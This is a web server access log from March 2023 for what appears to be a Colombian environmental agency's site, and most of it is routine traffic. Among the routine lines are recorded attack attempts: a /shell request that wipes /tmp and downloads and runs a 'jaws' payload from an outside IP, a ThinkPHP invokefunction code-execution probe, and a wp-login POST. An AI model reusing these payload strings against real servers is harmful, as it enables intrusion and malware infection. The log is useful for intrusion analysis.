201.245.192.253 - - [19/Mar/2023:17:03:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [19/Mar/2023:17:04:39 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.206 - - [19/Mar/2023:17:04:47 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
69.147.93.14 - - [19/Mar/2023:17:05:28 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
192.168.175.240 - - [19/Mar/2023:17:05:39 -0500] "GET / HTTP/1.1" 200 4720
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40958
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:05:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:05:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:05:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:05:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34325
201.244.229.212 - - [19/Mar/2023:17:06:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12881
201.244.229.212 - - [19/Mar/2023:17:06:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 160948
201.244.229.212 - - [19/Mar/2023:17:06:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:06:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:06:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:06:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:06:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:06:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:06:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.168.175.240 - - [19/Mar/2023:17:06:39 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [19/Mar/2023:17:05:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [19/Mar/2023:17:07:39 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [19/Mar/2023:17:06:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
66.249.70.182 - - [19/Mar/2023:17:08:04 -0500] "-" 408 -
179.14.141.63 - - [19/Mar/2023:17:08:25 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
173.252.95.20 - - [19/Mar/2023:17:08:33 -0500] "GET /autoridades-ambientales-de-bogota-y-cundinamarca-y-proteccion-animal-unidas-por-el-cuidado-de-los-animales-en-esta-navidad.html HTTP/1.1" 206 1029
216.245.221.92 - - [19/Mar/2023:17:08:37 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [19/Mar/2023:17:08:39 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [19/Mar/2023:17:09:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
201.244.229.212 - - [19/Mar/2023:17:09:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 159161
192.168.175.240 - - [19/Mar/2023:17:09:39 -0500] "GET / HTTP/1.1" 200 4720
201.244.229.212 - - [19/Mar/2023:17:09:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 353375
201.244.229.212 - - [19/Mar/2023:17:09:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 148665
192.168.175.240 - - [19/Mar/2023:17:10:39 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [19/Mar/2023:17:11:39 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [19/Mar/2023:17:12:39 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [19/Mar/2023:17:11:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Mar/2023:17:13:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Mar/2023:17:11:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56277
192.168.175.240 - - [19/Mar/2023:17:13:39 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [19/Mar/2023:17:13:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
192.168.175.240 - - [19/Mar/2023:17:14:39 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [19/Mar/2023:17:15:39 -0500] "GET / HTTP/1.1" 200 4720
181.78.23.30 - - [19/Mar/2023:17:15:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.78.23.30 - - [19/Mar/2023:17:15:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.78.23.30 - - [19/Mar/2023:17:15:55 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.184.30.170 - - [19/Mar/2023:17:16:36 -0500] "GET /BLA/resoluciones/AUTOS%202022/7683.pdf HTTP/1.1" 200 545004
192.168.175.240 - - [19/Mar/2023:17:16:39 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [19/Mar/2023:17:15:50 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
201.184.30.170 - - [19/Mar/2023:17:16:47 -0500] "GET /BLA/resoluciones/AUTOS%202022/7515.pdf HTTP/1.1" 200 421348
201.184.30.170 - - [19/Mar/2023:17:16:56 -0500] "GET /BLA/resoluciones/AUTOS%202022/7436.pdf HTTP/1.1" 200 1134549
192.168.175.240 - - [19/Mar/2023:17:17:39 -0500] "GET / HTTP/1.1" 200 4720
201.244.229.212 - - [19/Mar/2023:17:17:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40909
201.244.229.212 - - [19/Mar/2023:17:17:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:17:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:17:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:17:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:17:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:17:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:17:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:17:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:17:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:17:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:17:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34276
201.244.229.212 - - [19/Mar/2023:17:18:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12870
201.244.229.212 - - [19/Mar/2023:17:18:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 151407
201.244.229.212 - - [19/Mar/2023:17:18:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:18:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:18:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:18:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:18:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:18:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:18:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.245.221.92 - - [19/Mar/2023:17:18:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Mar/2023:17:16:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [19/Mar/2023:17:18:39 -0500] "GET / HTTP/1.1" 200 4720
201.244.229.212 - - [19/Mar/2023:17:18:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 153474
201.245.192.253 - - [19/Mar/2023:17:18:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
201.244.229.212 - - [19/Mar/2023:17:18:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 353170
201.244.229.212 - - [19/Mar/2023:17:19:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 148410
172.22.2.4 - - [19/Mar/2023:17:17:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [19/Mar/2023:17:19:39 -0500] "GET / HTTP/1.1" 200 4720
201.184.30.170 - - [19/Mar/2023:17:20:12 -0500] "GET /BLA/resoluciones/AUTOS%202022/7418.pdf HTTP/1.1" 200 413719
220.133.226.34 - - [19/Mar/2023:17:20:17 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 193.42.32.175/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.184.30.170 - - [19/Mar/2023:17:20:20 -0500] "GET /BLA/resoluciones/AUTOS%202022/7383.pdf HTTP/1.1" 200 430617
201.184.30.170 - - [19/Mar/2023:17:20:25 -0500] "GET /BLA/resoluciones/AUTOS%202022/7382.pdf HTTP/1.1" 200 409560
201.184.30.170 - - [19/Mar/2023:17:20:31 -0500] "GET /BLA/resoluciones/AUTOS%202022/7357.pdf HTTP/1.1" 200 414248
192.168.175.240 - - [19/Mar/2023:17:20:39 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [19/Mar/2023:17:20:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42866
201.245.192.253 - - [19/Mar/2023:17:20:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43656
52.167.144.43 - - [19/Mar/2023:17:20:48 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
192.168.175.240 - - [19/Mar/2023:17:21:39 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [19/Mar/2023:17:22:39 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [19/Mar/2023:17:23:37 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [19/Mar/2023:17:23:39 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [19/Mar/2023:17:23:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42239
172.22.2.4 - - [19/Mar/2023:17:22:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [19/Mar/2023:17:24:39 -0500] "GET / HTTP/1.1" 200 4720
69.171.231.1 - - [19/Mar/2023:17:25:14 -0500] "GET /images/Puntos%20calientes%2024%20de%20febrero.jpeg HTTP/1.1" 200 42626
172.22.2.4 - - [19/Mar/2023:17:23:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
192.168.175.240 - - [19/Mar/2023:17:25:39 -0500] "GET / HTTP/1.1" 200 4720
201.184.30.170 - - [19/Mar/2023:17:25:49 -0500] "GET /BLA/resoluciones/AUTOS%202022/7354.pdf HTTP/1.1" 200 2591048
201.184.30.170 - - [19/Mar/2023:17:25:58 -0500] "GET /BLA/resoluciones/AUTOS%202022/7353.pdf HTTP/1.1" 200 702878
201.184.30.170 - - [19/Mar/2023:17:26:04 -0500] "GET /BLA/resoluciones/AUTOS%202022/7352.pdf HTTP/1.1" 200 426877
201.184.30.170 - - [19/Mar/2023:17:26:08 -0500] "GET /BLA/resoluciones/AUTOS%202022/7325.pdf HTTP/1.1" 200 389161
185.119.81.105 - - [19/Mar/2023:17:26:10 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [19/Mar/2023:17:26:11 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
192.168.175.240 - - [19/Mar/2023:17:26:39 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [19/Mar/2023:17:27:39 -0500] "GET / HTTP/1.1" 200 4720
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40898
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34265
201.244.229.212 - - [19/Mar/2023:17:28:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12887
201.244.229.212 - - [19/Mar/2023:17:28:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12895
216.245.221.92 - - [19/Mar/2023:17:28:37 -0500] "HEAD / HTTP/1.1" 200 -
201.244.229.212 - - [19/Mar/2023:17:28:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 145121
201.244.229.212 - - [19/Mar/2023:17:28:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
192.168.175.240 - - [19/Mar/2023:17:28:39 -0500] "GET / HTTP/1.1" 200 4720
201.244.229.212 - - [19/Mar/2023:17:28:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.229.212 - - [19/Mar/2023:17:28:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
